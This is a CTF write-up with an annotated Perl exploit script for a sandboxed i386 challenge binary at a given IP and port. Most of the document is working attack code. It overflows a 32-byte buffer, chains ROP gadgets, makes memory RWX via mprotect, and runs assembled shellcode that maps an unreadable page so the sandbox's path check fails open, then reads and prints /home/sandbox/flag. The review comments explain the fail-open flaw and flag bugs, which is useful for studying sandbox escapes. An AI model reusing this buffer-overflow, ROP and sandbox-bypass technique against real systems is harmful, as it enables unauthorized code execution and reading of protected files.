Tags: bin
Rating:
Exploit warmup: make rwx memory using mprotect to write shellcode,
use mmap() to create only readable memory, read the path /home/sandbox/flag into it, and call open(), read(), write().
The sandbox tries to validate the path using process_vm_readv(), but that call fails, which makes realpath() fail too and
thus bypasses the path check.
-- @_cutz
# Exploit script for a sandboxed CTF binary (see the header above). The root
# cause it relies on is a validation step that fails open: when the sandbox's
# process_vm_readv() cannot read the path buffer, realpath() fails and the
# open() is let through anyway. The defensive takeaway is that a check which
# errors out must reject, not fall through.
#
# NOTE(review): no `use strict`/`use warnings`; $sock, $assembler and
# $shellcode are package globals. `sock`, `assembler` and p32() come from the
# author's cutztools helper library, which is not shown here.
use cutztools;
# NOTE(review): indirect object syntax; `sock->new(...)` is the conventional
# form and stays unambiguous if a sub named `sock` is ever in scope.
$sock = new sock("202.120.7.207", 52608);
# prepare stack
# Every exchange below follows the same pattern: read the target's prompt
# line, send one payload, read the response line. Each payload is 52 bytes:
# 32 bytes of filler followed by p32() values. Presumably the target reads
# into a 32-byte buffer and the values after it overwrite what follows on the
# stack — the frame layout itself is not visible from this script.
# Stage 1: start/pagesize/prot read like mprotect(start, 0x1000, 7) arguments
# staged for later; prot 7 is PROT_READ|PROT_WRITE|PROT_EXEC, matching the
# header's "rwx memory using mprotect". The value is repeated three times.
print $sock->readline();
$sock->print(
"B"x32 .
p32(0x080480D8) . # start
p32(0x1000) . # pagesize
p32(7)x3 # prot
);
print $sock->readline();
# prepare more stack
# Stage 2: the same start address, then a `syscall` gadget and two copies of
# the .bss address — the same address the final stage's read() writes the
# shellcode into.
print $sock->readline();
$sock->print(
"A"x32 .
p32(0x080480D8) . # start
"A"x4 .
p32(0x08048122) . # syscall
p32(0x08049000) . # bss
p32(0x08049000)
);
print $sock->readline();
# more
# Two filler rounds: only the start address carries meaning, the rest is
# padding to keep the 52-byte payload size.
for (1 .. 2) {
print $sock->readline();
$sock->print(
"B"x32 .
p32(0x080480D8) .
"B"x16
);
print $sock->readline();
}
# Final stage: a ROP-style fragment — the `read` gadget, with an
# `add esp, 0x30` gadget as its return address to skip past the arguments
# (fd 0 = stdin, dest = .bss, len = 125). The author notes 125 is also the
# mprotect syscall number; presumably read()'s return value (the byte count,
# left in %eax) then serves as the syscall number for a later `syscall`
# gadget, which is why the payload sent below is padded to exactly 125 bytes.
# TODO confirm against the target binary.
print $sock->readline();
$sock->print(
"B"x32 .
p32(0x0804811D) . # read
p32(0x080481B8) . # add esp, 0x30
p32(0) . # stdin
p32(0x08049000) . # bss
p32(125) # 125 -> mprotect
);
print $sock->readline();
# Shellcode (i386 Linux, int 0x80 ABI), assembled at runtime. Comments cannot
# go inside the string without changing what is assembled, so they live here.
#  1. syscall 90 (old_mmap, which takes a pointer to an argument block). The
#     block is built at 0x08049500: addr 0x13370000, len 0x2000, prot 2,
#     flags 0x32 (= MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS). The fd and offset
#     fields are never written, so they are whatever already sits at
#     0x08049510 — presumably zeroed .bss, not verified here.
#     prot 2 is PROT_WRITE without PROT_READ; the header's "only readable"
#     reads as a slip. Presumably the point is a mapping the sandbox's
#     process_vm_readv() cannot read while the process itself still can,
#     which is what makes the path check fail — TODO confirm.
#  2. read(0, 0x13370000, 0xff) in a loop, advancing the buffer by 0xff each
#     time, until a read returns anything other than 0xff (fewer bytes, 0 at
#     EOF, or a negative errno). This pulls in the path string that is sent
#     right after the shellcode below.
#  3. open(0x13370000, 0 /* O_RDONLY */); the returned fd is kept in %esi.
#  4. read(fd, %esp, 25): `subl $1, %esp` reserves a single byte but 25 are
#     read, so 24 bytes above the new %esp are overwritten. `movb $3, %al` and
#     `movb $25, %dl` rely on the upper bytes of %eax/%edx already being zero
#     (%eax still holds the small fd, %edx was 0xff).
#  5. write(1, %esp, 25) sends those bytes to stdout.
# There is no exit syscall: after the write, execution falls through into the
# padding that follows the code in memory. The output has already been sent
# by then, so the eventual crash does not matter for the exploit, but it is
# sloppy. The `read:` label is never jumped to.
$assembler = new assembler();
$assembler->assemble32('
_start:
movl $90, %eax
movl $0x08049500, %ebx
movl $0x13370000, (%ebx)
movl $0x2000, 4(%ebx)
movl $2, 8(%ebx)
movl $0x32, 12(%ebx)
int $0x80
movl $3, %eax
xorl %ebx, %ebx
movl $0x13370000, %ecx
movl $0xff, %edx
loop:
movl $3, %eax
int $0x80
addl $0xff, %ecx
cmp $0xff, %eax
je loop
movl $0x13370000, %ebx
movl $5, %eax
xorl %ecx, %ecx
int $0x80
movl %eax, %esi
read:
movl %esi, %ebx
movb $3, %al
subl $1, %esp
lea (%esp), %ecx
movb $25, %dl
int $0x80
movl $4, %eax
movl $1, %ebx
movl $25, %edx
int $0x80
');
$shellcode = $assembler->raw();
# The first 125 bytes are what the read(0, bss, 125) above consumes; the
# NUL-terminated path that follows stays in the socket and is what the
# shellcode's own read loop picks up. This assumes the 125 bytes arrive in a
# single read — a short read would desynchronise the two halves.
# NOTE(review): nothing checks that the assembled code fits in 125 bytes; if
# it ever grows past that, `"A" x (negative)` is silently the empty string and
# the path would be misaligned. By a rough count the code is ~123 bytes, so
# the margin is about two bytes — TODO verify with `length $shellcode`.
$sock->print($shellcode . "A"x(125-length $shellcode) . "/home/sandbox/flag\x00");
# Dump whatever the target writes back (presumably up to 1024 bytes, i.e. the
# 25 bytes the shellcode's write() produced).
print $sock->readnum(1024);